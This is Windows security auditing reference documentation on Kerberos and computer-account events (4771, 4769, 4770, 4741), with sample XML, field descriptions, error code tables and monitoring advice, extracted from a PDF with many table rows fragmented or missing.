Recommendations for this event.
Event XML:
- <System>
<Level>0</Level>
<Task>14339</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ServiceName">krbtgt/CONTOSO.LOCAL</Data>
<Data Name="PreAuthType">15</Data>
<Data Name="CertIssuerName" />
<Data Name="CertSerialNumber" />
<Data Name="CertThumbprint" />
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Security ID [Type = SID ]: SID of account object for which (TGT) ticket was requested. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see
the source data in the event.
For example: CONTOSO\dadmin or CONTOSO\WIN81$.
token to identify the user in all subsequent interactions with Windows security. When a SID has been used
as the unique identifier for a user or group, it cannot ever be used again to identify another user or group.
For more information about SIDs, see Security identifiers.
Account Name: [Type = UnicodeString]: the name of account, for which (TGT) ticket was requested.
Computer account name ends with $ character.
User account example: dadmin
Service Name [Type = UnicodeString]: the name of the service in the Kerberos Realm to which TGT
request was sent. Typically has one of the following formats:
krbtgt/DOMAIN_NETBIOS_NAME. Example: krbtgt/CONTOSO
krbtgt/DOMAIN_FULL_NAME. Example: krbtgt/CONTOSO.LOCAL
Client Address [Type = UnicodeString]: IP address of the computer from which the TGT request was
::1 - localhost.
Client Port [Type = UnicodeString]: source port number of client network connection (TGT request
connection).
Ticket Options: [Type = HexInt32]: this is a set of different Ticket Flags in hexadecimal format.
Example:
Binary view: 01000000100000010000000000010000

0 Reserved -

presented TGT.


one in the TGT.



7 Invalid This flag indicates that a ticket is

invalid, and it must be validated by the
KDC before use. Application servers
must reject tickets which have this flag
set.


TGT.


another KDC.



AS-REQ or TGS-REQ.
16-25 Unused -

required to honor
option.
supported by KILE.

acceptable if a ticket with the
requested life cannot otherwise be
provided, in which case a renewable
ticket may be issued with a renew-till
equal to the requested end time. The
value of the renew-till field may still be
limited by local limits, or limits selected
by the individual principal or server.
29 Unused -

valid. This option will only be honored
if the ticket to be renewed has its
its renew-till field has not passed. The

supported by KILE.
Table 6. Kerberos ticket flags.
Failure Code [Type = HexInt32]: hexadecimal failure code of failed TGT issue operation. The table below
contains the list of the most common error codes for this event:
authentication data) certificate cannot be
located. This can happen
because the wrong
certification authority (CA) is
being queried or the proper
CA cannot be contacted in
order to get Domain
certificates for the domain
controller.
templates).


Pre-Authentication Type [Type = UnicodeString]: the code of pre-Authentication type which was used in
TGT request.
Table 5. Kerberos Pre-Authentication types.
0 - Logon without Pre-Authentication.
2 PA-ENC-TIMESTAMP This is a normal type for standard

password authentication.
11 PA-ETYPE-INFO The ETYPE-INFO pre-authentication

Never saw this Pre-Authentication
Type in Microsoft Active Directory
environment.
15 PA-PK-AS-REP_OLD Used for Smart Card logon

authentication.
17 PA-PK-AS-REP This type should also be used for Smart

Card authentication, but in certain
Active Directory environments, it is
never seen.
19 PA-ETYPE-INFO2 The ETYPE-INFO2 pre-authentication

Never saw this Pre-Authentication
Type in Microsoft Active Directory
environment.
20 PA-SVR-REFERRAL-INFO Used in KDC Referrals tickets.
138 PA-ENCRYPTED-CHALLENGE Logon using Kerberos Armoring (FAST).

Supported starting from Windows
Server 2012 domain controllers and
Windows 8 clients.
- This type shows in Audit Failure events.
Certificate Information:
Certificate Issuer Name [Type = UnicodeString]: the name of Certification Authority which issued
smart card certificate. Populated in Issued by field in certificate. Always empty for 4771 events.
Certificate Serial Number [Type = UnicodeString]: smart card certificate’s serial number. Can be found
in Serial number field in the certificate. Always empty for 4771 events.
Certificate Thumbprint [Type = UnicodeString]: smart card certificate’s thumbprint. Can be found in
Thumbprint field in the certificate. Always empty for 4771 events.

For 4771(F ): Kerberos pre-authentication failed.
High-value accounts: You might have high-value domain Monitor this event with the “Security ID” that corresponds
or local accounts for which you need to monitor each action. to the high-value account or accounts.
Examples of high-value accounts are database
administrators, built-in local administrator account, domain
administrators, service accounts, domain controller accounts
and so on.
Anomalies or malicious actions: You might have specific When you monitor for anomalies or malicious actions, use
requirements for detecting anomalies or monitoring the “Security ID” (with other information) to monitor how
potential malicious actions. For example, you might need to or when a particular account is being used.
monitor for use of an account outside of working hours.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Security ID” that corresponds
or guest accounts, or other accounts that should never be to the accounts that should never be used.
used.
accounts that are the only ones allowed to perform actions the “Security ID” for accounts that are outside the whitelist.
corresponding to particular events.
Account naming conventions: Your organization might Monitor “Subject\Account Name” for names that don’t
have specific naming conventions for account names. comply with naming conventions.
private IP ranges.
If you know that Account Name should be used only from known list of IP addresses, track all Client
Address values for this Account Name in 4771 events. If Client Address is not from the whitelist,
generate the alert.
All Client Address = ::1 means local authentication. If you know the list of accounts which should log on
to the domain controllers, then you need to monitor for all possible violations, where Client Address =
::1 and Account Name is not allowed to log on to any domain controller.
Also monitor the fields shown in the following table, to discover the issues listed:
Pre-Authentication Type Value is not 15 when account must use a smart card for
authentication. For more information, see Table 5. Kerberos
Pre-Authentication types.
Pre-Authentication Type Value is not 2 when only standard password authentication

is in use in the organization. For more information, see Table
5. Kerberos Pre-Authentication types.
Pre-Authentication Type Value is not 138 when Kerberos Armoring is enabled for all
Kerberos communications in the organization. For more
Result Code 0x10 (KDC has no support for PADATA type (pre-
authentication data)). This error can help you to more quickly
identify smart-card related problems with Kerberos
authentication.
Result Code 0x18 ((Pre-authentication information was invalid), if you see,

for example N events in last N minutes. This can be an
indicator of brute-force attack on the account password,
especially for highly critical accounts.
4772(F): A Kerberos authentication ticket request
failed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Kerberos Authentication Service
Applies to
Windows 10
Windows Server 2016
Audit Kerberos Service Ticket Operations determines whether the operating system generates security audit
events for Kerberos service ticket requests.
Events are generated every time Kerberos is used to authenticate a user who wants to access a protected network
resource. Kerberos service ticket operation audit events can be used to track user activity.
Event volume: Very High on Kerberos Key Distribution Center servers.
This subcategory contains events about issued TGSs and failed TGS requests.
STRONGER STRONGER
STRONGER STRONGER
Domain IF Yes Yes Yes Expected volume

Controller is very high on
domain
controllers.
IF - We
recommend
Success auditing,
because you will
see all Kerberos
Service Ticket
requests (TGS
requests), which
are part of
service use and
access requests
by specific
accounts. Also,
you can see the
IP address from
which this
account
requested TGS,
when TGS was
requested, which
encryption type
was used, and so
on. For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections.
We recommend
Failure auditing,
because you will
see all failed
requests and be
able to
investigate the
reason for failure.
You will also be
able to detect
Kerberos issues
or possible attack
attempts.

makes sense only
on domain
controllers.

makes sense only
on domain
controllers.
Events List:
4769(S, F ): A Kerberos service ticket was requested.
4770(S ): A Kerberos service ticket was renewed.
4773(F ): A Kerberos service ticket request failed.
4769(S, F): A Kerberos service ticket was requested.
Applies to
Windows 10
Windows Server 2016
Service Ticket Operations
Event Description:
This event generates every time Key
Distribution Center gets a Kerberos
Ticket Granting Service (TGS ) ticket
request.
controllers.
If TGS issue fails then you will see
Failure event with Failure Code
field not equal to “0x0”.
You will typically see many Failure
events with Failure Code “0x20”,
which simply means that a TGS
ticket has expired. These are
informational messages and have
little to no security relevance.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>14337</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">dadmin@CONTOSO.LOCAL</Data>
<Data Name="ServiceName">WIN2008R2$</Data>
<Data Name="LogonGuid">{F85C455E-C66E-205C-6B39-F6C60A7FE453}</Data>
<Data Name="TransmittedServices">-</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Account Name [Type = UnicodeString]: the user name of the account that requested the ticket in the User
Principal Name (UPN ) syntax. Computer account name ends with $ character in the user name part. This
field typically has the following value format: user_account_name@FULL\_DOMAIN\_NAME.
User account example: dadmin@CONTOSO.LOCAL
Computer account example: WIN81$@CONTOSO.LOCAL
Note Although this field is in the UPN format, this is not the attribute value of
"UserPrincipalName" of the user account. It is the "normalized" name or implicit UPN. It is built
from the user SamAccountName and the Active Directory domain name.
This parameter in this event is optional and can be empty in some cases.
Account Domain [Type = UnicodeString]: the name of the Kerberos Realm that Account Name belongs
to. This can appear in a variety of formats, including the following:
Logon GUID [Type = GUID ]: a GUID that can help you correlate this event (on a domain controller) with
other events (on the target computer for which the TGS was issued) that can contain the same Logon
GUID. These events are “4624: An account was successfully logged on”, “4648(S ): A logon was attempted
using explicit credentials” and “4964(S ): Special groups have been assigned to a new logon.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-
0000-000000000000}”.
Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.
Service Name [Type = UnicodeString]: the name of the account or computer for which the TGS ticket was
requested.
Service ID [Type = SID ]: SID of the account or computer object for which the TGS ticket was requested.
Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be
NULL SID – this value shows in Failure events.
Client Address [Type = UnicodeString]: IP address of the computer from which the TGS request was
::1 - localhost.
Client Port [Type = UnicodeString]: source port number of client network connection (TGS request
connection).
Example:
Binary view: 01000000100000010000000000010000

0 Reserved -

presented TGT.


one in the TGT.






TGT.


another KDC.



the “canonicalize” KDC option for the
AS-REQ or TGS-REQ.
16-25 Unused -

required to honor
option.
supported by KILE.

29 Unused -

its renew-till field has not passed. The

supported by KILE.
## Table 4. Kerberos encryption types
Ticket Encryption Type: [Type = HexInt32]: the cryptographic suite that was used for issued TGS.

R2.

R2.



Windows Vista.

Windows Vista.
Failure Code [Type = HexInt32]: hexadecimal result code of TGS issue operation. The table below contains
the list of the most common error codes for this event:
0x0 KDC_ERR_NONE No error No errors were found.
0x1 KDC_ERR_NAME_EXP Client's entry in KDC No information.

0x2 KDC_ERR_SERVICE_EXP Server's entry in KDC No information.

0x3 KDC_ERR_BAD_PVNO Requested Kerberos version No information.

number not supported
0x4 KDC_ERR_C_OLD_MAST_KV Client's key encrypted in old No information.

NO master key
0x5 KDC_ERR_S_OLD_MAST_KV Server's key encrypted in No information.

NO old master key
0x6 KDC_ERR_C_PRINCIPAL_UN Client not found in Kerberos The username doesn’t exist.
KNOWN database
0x7 KDC_ERR_S_PRINCIPAL_UN Server not found in This error can occur if the
KNOWN Kerberos database domain controller cannot
find the server’s name in
Active Directory. This error is
similar to
KDC_ERR_C_PRINCIPAL_UN
KNOWN except that it
occurs when the server
name cannot be found.
0x8 KDC_ERR_PRINCIPAL_NOT_ Multiple principal entries in This error occurs if duplicate

UNIQUE KDC database principal names exist.
Unique principal names are
crucial for ensuring mutual
authentication. Thus,
duplicate principal names
are strictly forbidden, even
across multiple realms.
Without unique principal
names, the client has no way
of ensuring that the server it
is communicating with is the
correct one.
0x9 KDC_ERR_NULL_KEY The client or server has a No master key was found
null key (master key) for client or server. Usually it
means that administrator
should reset the password
on the account.
0xA KDC_ERR_CANNOT_POSTD Ticket (TGT) not eligible for This error can occur if a
ATE postdating client requests postdating of
a Kerberos ticket. Postdating
is the act of requesting that
a ticket’s start time be set
into the future.
It also can occur if there is a
time difference between the
client and the KDC.
0xB KDC_ERR_NEVER_VALID Requested start time is later There is a time difference

than end time between the KDC and the
client.
0xC KDC_ERR_POLICY Requested start time is later This error is usually the
than end time result of logon restrictions in
place on a user’s account.
For example workstation
restriction, smart card
authentication requirement
or logon time restriction.
0xD KDC_ERR_BADOPTION KDC cannot accommodate Impending expiration of a

requested option TGT.
The SPN to which the client
is attempting to delegate
credentials is not in its
Allowed-to-delegate-to list
0xE KDC_ERR_ETYPE_NOTSUPP KDC has no support for In general, this error occurs
encryption type when the KDC or a client
receives a packet that it
cannot decrypt.
0xF KDC_ERR_SUMTYPE_NOSUP KDC has no support for The KDC, server, or client
P checksum type receives a packet for which it
does not have a key of the
appropriate encryption type.
The result is that the
computer is unable to
decrypt the ticket.
authentication data) certificate cannot be located.
This can happen because the
wrong certification authority
(CA) is being queried or the
proper CA cannot be
contacted.
templates).
0x11 KDC_ERR_TRTYPE_NO_SUPP KDC has no support for No information.

transited type
0x12 KDC_ERR_CLIENT_REVOKED Client’s credentials have This might be because of an

been revoked explicit disabling or because
of other restrictions in place
on the account. For example:
account disabled, expired, or
locked out.
0x13 KDC_ERR_SERVICE_REVOKE Credentials for server have No information.

D been revoked
0x14 KDC_ERR_TGT_REVOKED TGT has been revoked Since the remote KDC may
change its PKCROSS key
while there are PKCROSS
tickets still active, it SHOULD
cache the old PKCROSS keys
until the last issued
PKCROSS ticket expires.
Otherwise, the remote KDC
will respond to a client with
a KRB-ERROR message of
type
KDC_ERR_TGT_REVOKED.
details.
0x15 KDC_ERR_CLIENT_NOTYET Client not yet valid—try No information.

again later
0x16 KDC_ERR_SERVICE_NOTYET Server not yet valid—try No information.

again later


0x19 KDC_ERR_PREAUTH_REQUIR Additional pre- This error often occurs in

ED authentication required UNIX interoperability
scenarios. MIT-Kerberos
clients do not request pre-
authentication when they
send a KRB_AS_REQ
message. If pre-
authentication is required
(the default), Windows
systems will send this error.
Most MIT-Kerberos clients
will respond to this error by
giving the pre-
authentication, in which case
the error can be ignored,
but some clients might not
respond in this way.
0x1A KDC_ERR_SERVER_NOMATC KDC does not know about No information.

H the requested server
0x1B KDC_ERR_MUST_USE_USER2 Server principal valid for This error occurs because
USER user2user only the service is missing an
SPN.
0x1F KRB_AP_ERR_BAD_INTEGRIT Integrity check on The authenticator was

Y decrypted field failed encrypted with something
other than the session key.
The result is that the client
cannot decrypt the resulting
message. The modification
of the message could be the
result of an attack or it could
be because of network
noise.
0x20 KRB_AP_ERR_TKT_EXPIRED The ticket has expired The smaller the value for the
“Maximum lifetime for user
ticket” Kerberos policy
setting, the more likely it is
that this error will occur.
Because ticket renewal is
automatic, you should not
have to do anything if you
get this message.
0x21 KRB_AP_ERR_TKT_NYV The ticket is not yet valid The ticket presented to the
server is not yet valid (in
relationship to the server
time). The most probable
cause is that the clocks on
the KDC and the client are
not synchronized.
If cross-realm Kerberos
authentication is being
attempted, then you should
verify time synchronization
between the KDC in the
target realm and the KDC in
the client realm, as well.
0x22 KRB_AP_ERR_REPEAT The request is a replay This error indicates that a

specific authenticator
showed up twice — the KDC
has detected that this
session ticket duplicates one
that it has already received.
0x23 KRB_AP_ERR_NOT_US The ticket is not for us The server has received a
ticket that was meant for a
different realm.
0x24 KRB_AP_ERR_BADMATCH The ticket and authenticator The KRB_TGS_REQ is being

do not match sent to the wrong KDC.
There is an account
mismatch during protocol
transition.
0x25 KRB_AP_ERR_SKEW The clock skew is too great This error is logged if a client
computer sends a
timestamp whose value
differs from that of the
server’s timestamp by more
than the number of minutes
found in the “Maximum
tolerance for computer clock
synchronization” setting in
Kerberos policy.
0x26 KRB_AP_ERR_BADADDR Network address in network Session tickets MAY include

layer header doesn't match the addresses from which
address inside ticket they are valid. This error can
occur if the address of the
computer sending the ticket
is different from the valid
address in the ticket. A
possible cause of this could
be an Internet Protocol (IP)
address change. Another
possible cause is when a
ticket is passed through a
proxy server or NAT. The
client is unaware of the
address scheme used by the
proxy server, so unless the
program caused the client to
request a proxy server ticket
with the proxy server's
source address, the ticket
could be invalid.
0x27 KRB_AP_ERR_BADVERSION Protocol version numbers When an application

don't match (PVNO) receives a KRB_SAFE
message, it verifies it. If any
error occurs, an error code is
reported for use by the
application.
The message is first checked
by verifying that the
protocol version and type
fields match the current
version and KRB_SAFE,
respectively. A mismatch
generates a
KRB_AP_ERR_BADVERSION.
details.
0x28 KRB_AP_ERR_MSG_TYPE Message type is This message is generated

unsupported when target server finds
that message format is
wrong. This applies to
KRB_AP_REQ, KRB_SAFE,
KRB_PRIV and KRB_CRED
messages.
This error also generated if
use of UDP protocol is being
attempted with User-to-
User authentication.
0x29 KRB_AP_ERR_MODIFIED Message stream modified The authentication data was

and checksum didn't match encrypted with the wrong
key for the intended server.
The authentication data was
modified in transit by a
hardware or software error,
or by an attacker.
The client sent the
wrong server because
incorrect DNS data caused
the client to send the
request to the wrong server.
The client sent the
wrong server because DNS
data was out-of-date on the
client.
0x2A KRB_AP_ERR_BADORDER Message out of order This event generates for

(possible tampering) KRB_SAFE and KRB_PRIV
messages if an incorrect
sequence number is
included, or if a sequence
number is expected but not
present. See RFC4120 for
more details.
0x2C KRB_AP_ERR_BADKEYVER Specified version of key is This error might be

not available generated on server side
KRB_AP_REQ message. If the
key version indicated by the
Ticket in the KRB_AP_REQ is
not one the server can use
(e.g., it indicates an old key,
and the server no longer
possesses a copy of the old
key), the
KRB_AP_ERR_BADKEYVER
error is returned.
0x2D KRB_AP_ERR_NOKEY Service key not available This error might be

generated on server side
KRB_AP_REQ message.
Because it is possible for the
server to be registered in
multiple realms, with
different keys in each, the
realm field in the
unencrypted portion of the
ticket in the KRB_AP_REQ is
used to specify which secret
key the server should use to
decrypt that ticket. The
KRB_AP_ERR_NOKEY error
code is returned if the server
doesn't have the proper key
to decipher the ticket.
0x2E KRB_AP_ERR_MUT_FAIL Mutual authentication failed No information.
0x2F KRB_AP_ERR_BADDIRECTIO Incorrect message direction No information.

N
0x30 KRB_AP_ERR_METHOD Alternative authentication According RFC4120 this

method required error message is obsolete.
0x31 KRB_AP_ERR_BADSEQ Incorrect sequence number No information.

in message
0x32 KRB_AP_ERR_INAPP_CKSUM Inappropriate type of When KDC receives

checksum in message KRB_TGS_REQ message it
(checksum may be decrypts it, and after the
unsupported) user-supplied checksum in
the Authenticator MUST be
verified against the contents
of the request, and the
message MUST be rejected if
the checksums do not
match (with an error code of
KRB_AP_ERR_MODIFIED) or
if the checksum is not
collision-proof (with an error
code of
KRB_AP_ERR_INAPP_CKSUM
).
0x33 KRB_AP_PATH_NOT_ACCEPT Desired path is unreachable No information.

ED
0x34 KRB_ERR_RESPONSE_TOO_B Too much data The size of a ticket is too

IG large to be transmitted
reliably via UDP. In a
Windows environment, this
message is purely
informational. A computer
running a Windows
operating system will
automatically try TCP if UDP
fails.
0x3C KRB_ERR_GENERIC Generic error Group membership has

overloaded the PAC.
Multiple recent password
changes have not
propagated.
Crypto subsystem error
caused by running out of
memory.
SPN too long.
SPN has too many parts.
0x3D KRB_ERR_FIELD_TOOLONG Field is too long for this Each request

implementation (KRB_KDC_REQ) and
response (KRB_KDC_REP or
KRB_ERROR) sent over the
TCP stream is preceded by
the length of the request as
4 octets in network byte
order. The high bit of the
length is reserved for future
expansion and MUST
currently be set to zero. If a
KDC that does not
understand how to interpret
a set high bit of the length
encoding receives a request
with the high order bit of
the length set, it MUST
return a KRB-ERROR
message with the error
KRB_ERR_FIELD_TOOLONG
and MUST close the TCP
stream.
0x3E KDC_ERR_CLIENT_NOT_TRU The client trust failed or is This typically happens when
STED not implemented user’s smart-card certificate
is revoked or the root
Certification Authority that
issued the smart card
certificate (in a chain) is not
trusted by the domain
controller.
0x3F KDC_ERR_KDC_NOT_TRUSTE The KDC server trust failed The trustedCertifiers field
D or could not be verified contains a list of certification
authorities trusted by the
client, in the case that the
client does not possess the
KDC's public key certificate.
If the KDC has no certificate
signed by any of the
trustedCertifiers, then it
returns an error of type
KDC_ERR_KDC_NOT_TRUSTE
D. See RFC1510 for more
details.
0x40 KDC_ERR_INVALID_SIG The signature is invalid This error is related to

PKINIT. If a PKI trust
relationship exists, the KDC
then verifies the client's
signature on AuthPack (TGT
request signature). If that
fails, the KDC returns an
error message of type
KDC_ERR_INVALID_SIG.
0x41 KDC_ERR_KEY_TOO_WEAK A higher encryption level is If the clientPublicValue field

needed is filled in, indicating that the
client wishes to use Diffie-
Hellman key agreement,
then the KDC checks to see
that the parameters satisfy
its policy. If they do not (e.g.,
the prime size is insufficient
for the expected encryption
type), then the KDC sends
back an error message of
type
KDC_ERR_KEY_TOO_WEAK.
0x42 KRB_AP_ERR_USER_TO_USE User-to-user authorization In the case that the client

R_REQUIRED is required application doesn't know
that a service requires user-
to-user authentication, and
requests and receives a
conventional KRB_AP_REP,
the client will send the
KRB_AP_REP request, and
the server will respond with
a KRB_ERROR token as
described in RFC1964, with
a msg-type of
KRB_AP_ERR_USER_TO_USER
_REQUIRED.
0x43 KRB_AP_ERR_NO_TGT No TGT was presented or In user-to-user

available authentication if the service
does not possess a ticket
granting ticket, it should
return the error
KRB_AP_ERR_NO_TGT.
0x44 KDC_ERR_WRONG_REALM Incorrect domain or Although this error rarely

principal occurs, it occurs when a
client presents a cross-realm
TGT to a realm other than
the one specified in the TGT.
Typically, this results from
incorrectly configured DNS.
Transited Services [Type = UnicodeString]: this field contains list of SPNs which were requested if Kerberos
delegation was used.
Note Service Principal Name (SPN ) is the name by which a client uniquely identifies an instance of a
service. If you install multiple instances of a service on computers throughout a forest, each instance must
have its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients
might use for authentication. For example, an SPN always includes the name of the host computer on which
the service instance is running, so a service instance might register an SPN for each name or alias of its host.

For 4769(S, F ): A Kerberos service ticket was requested.
High-value accounts: You might have high-value domain or Monitor this event with the “Account Information\Account
local accounts for which you need to monitor each action. Name” that corresponds to the high-value account or
Examples of high-value accounts are database administrators, accounts.
requirements for detecting anomalies or monitoring potential “Account Information\Account Name” (with other
malicious actions. For example, you might need to monitor information) to monitor how or when a particular account is
for use of an account outside of working hours. being used.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Account Information\Account
or guest accounts, or other accounts that should never be Name” that corresponds to the accounts that should never
used. be used.
External accounts: You might be monitoring accounts from Monitor this event for the “Account Information\Account
another domain, or “external” accounts that are not allowed Domain” corresponding to another domain or “external”
to perform certain actions (represented by certain specific location.
events).
Restricted-use computers or devices: You might have Monitor the target Computer: (or other target device) for
certain computers, machines, or devices on which certain actions performed by the “Account Information\Account
people (accounts) should not typically perform any actions. Name” that you are concerned about.
Account naming conventions: Your organization might Monitor “User ID” for names that don’t comply with naming
have specific naming conventions for account names. conventions.
If you know that Account Name should never request any tickets for (that is, never get access to) a
particular computer account or service account, monitor for 4769 events with the corresponding Account
Name and Service ID fields.
private IP ranges.
If you know that Account Name should be able to request tickets (should be used) only from a known
whitelist of IP addresses, track all Client Address values for this Account Name in 4769 events. If Client
Address is not from your whitelist of IP addresses, generate the alert.
All Client Address = ::1 means local TGS requests, which means that the Account Name logged on to a
domain controller before making the TGS request. If you have a whitelist of accounts allowed to log on to
domain controllers, monitor events with Client Address = ::1 and any Account Name outside the
whitelist.
Monitor for a Ticket Encryption Type of 0x1 or 0x3, which means the DES algorithm was used. DES
should not be in use, because of low security and known vulnerabilities. It is disabled by default starting
from Windows 7 and Windows Server 2008 R2.
Starting with Windows Vista and Windows Server 2008, monitor for a Ticket Encryption Type other
than 0x11 and 0x12. These are the expected values, starting with these operating systems, and represent
AES -family algorithms.
If you have a list of important Failure Codes, monitor for these codes.
4770(S): A Kerberos service ticket was renewed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Kerberos Service Ticket
Operations
Event Description:
This event generates for every Ticket Granting
Service (TGS ) ticket renewal.
controllers.
Note For recommendations, see Security

Monitoring Recommendations for this event.
Event XML:
- <System>
<Level>0</Level>
<Task>14337</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">WIN2008R2$@CONTOSO.LOCAL</Data>
<Data Name="ServiceName">krbtgt</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Account Name [Type = UnicodeString]: the User Principal Name (UPN ) of the account that requested
ticket renewal. Computer account name ends with $ character in UPN. This field typically has the following
value format: user_account_name@FULL\_DOMAIN\_NAME.
User account example: dadmin@CONTOSO.LOCAL
Computer account example: WIN81$@CONTOSO.LOCAL
Account Domain [Type = UnicodeString]: the name of the Kerberos Realm that Account Name belongs
to. This can appear in a variety of formats, including the following:
Service Name [Type = UnicodeString]: the name of the account or computer for which the TGS ticket was
renewed.
Service ID [Type = SID ]: SID of the account or computer object for which the TGS ticket was renewed.
Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved,
you will see the source data in the event.
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.
Client Address [Type = UnicodeString]: IP address of the computer from which the TGS renewal request
was received. Formats vary, and include the following:
::1 - localhost.
Client Port [Type = UnicodeString]: source port number of client network connection (TGS renewal request
connection).
Example:
Binary view: 01000000100000010000000000010000
Using MSB 0 bit numbering we have bit 1, 8, 15 and 27 set = Forwardable, Renewable, Canonicalize,
Renewable-ok.

0 Reserved -

presented TGT.


one in the TGT.






TGT.


protocol. KDCs MUST NOT issue a ticket
with this flag set. KDCs SHOULD NOT
preserve this flag if it is set by another
KDC.



AS-REQ or TGS-REQ.
16-25 Unused -

required to honor
option.
supported by KILE.

29 Unused -

it’s renew-till field has not passed. The

a postdated ticket. Should not be in use,
because postdated tickets are not
supported by KILE.
Ticket Encryption Type: [Type = HexInt32]: the cryptographic suite that was used in renewed TGS.

R2.

R2.



Windows Vista.

Windows Vista.

For 4770(S ): A Kerberos service ticket was renewed.
This event typically has informational only purpose.
4773(F): A Kerberos service ticket request failed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Kerberos Service Ticket Operations
Audit Other Account Logon Events
Applies to
Windows 10
Windows Server 2016
General Subcategory Information:
This auditing subcategory does not contain any events. It is intended for future use.
STRONGER STRONGER
Domain No No No No This auditing

Controller subcategory does
not contain any
events. It is
intended for
future use, and
there is no
reason to enable
it.
Member Server No No No No This auditing

subcategory does
not contain any
events. It is
intended for
future use, and
there is no
reason to enable
it.
Workstation No No No No This auditing

subcategory does
not contain any
events. It is
intended for
future use, and
there is no
reason to enable
it.
Applies to
Windows 10
Windows Server 2016
Audit Application Group Management generates events for actions related to application groups, such as group
creation, modification, addition or removal of group member and some other actions.
Application groups are used by Authorization Manager.
Audit Application Group Management subcategory is out of scope of this document, because Authorization
Manager is very rarely in use and it is deprecated starting from Windows Server 2012.
STRONGER STRONGER
Domain - - - - This subcategory

Controller is outside the
scope of this
document.
Member Server - - - - This subcategory

is outside the
scope of this
document.
Workstation - - - - This subcategory

is outside the
scope of this
document.
4783(S): A basic application group was created.

4784(S): A basic application group was changed.
4785(S): A member was added to a basic application group.
4786(S): A member was removed from a basic application group.
4787(S): A non-member was added to a basic application group.
4788(S): A non-member was removed from a basic application group.
4789(S): A basic application group was deleted.
4790(S): An LDAP query group was created.
4791(S): An LDAP query group was changed.
4792(S): An LDAP query group was deleted.
Applies to
Windows 10
Windows Server 2016
Audit Computer Account Management determines whether the operating system generates audit events when a
computer account is created, changed, or deleted.
This policy setting is useful for tracking account-related changes to computers that are members of a domain.
Event volume: Low on domain controllers.
This subcategory allows you to audit events generated by changes to computer accounts such as when a
computer account is created, changed, or deleted.
STRONGER STRONGER
STRONGER STRONGER
Domain Yes No Yes No We recommend

Controller monitoring
changes to critical
computer objects
in Active
Directory, such as
domain
controllers,
administrative
workstations, and
critical servers.
It's especially
important to be
informed if any
critical computer
account objects
are deleted.
Additionally,
events in this
subcategory will
give you
information
about who
deleted, created,
or modified a
computer object,
and when the
action was taken.
Typically volume
of these events is
low on domain
controllers.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.

generates events
only on domain
controllers.

generates events
only on domain
controllers.
Events List:
4741(S ): A computer account was created.
4742(S ): A computer account was changed.
4743(S ): A computer account was deleted.
4741(S): A computer account was created.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Computer Account
Management
Event Description:
This event generates every time a new
computer object is created.
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13825</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">WIN81$</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0xc88b2</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">WIN81$</Data>
<Data Name="DisplayName">-</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">-</Data>
<Data Name="HomePath">-</Data>
<Data Name="ScriptPath">-</Data>
<Data Name="ProfilePath">-</Data>
<Data Name="UserWorkstations">-</Data>
<Data Name="PasswordLastSet">8/12/2015 11:41:39 AM</Data>
<Data Name="AccountExpires">%%1794</Data>
<Data Name="PrimaryGroupId">515</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x0</Data>
<Data Name="NewUacValue">0x80</Data>
<Data Name="UserAccountControl">%%2087</Data>
<Data Name="UserParameters">-</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">%%1793</Data>
<Data Name="DnsHostName">Win81.contoso.local</Data>
<Data Name="ServicePrincipalNames">HOST/Win81.contoso.local RestrictedKrbHost/Win81.contoso.local HOST/WIN81
RestrictedKrbHost/WIN81</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “create Computer object” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.
Account Name [Type = UnicodeString]: the name of the account that requested the “create Computer
object” operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the following:
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
New Computer Account:
Security ID [Type = SID ]: SID of created computer account. Event Viewer automatically tries to resolve
SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
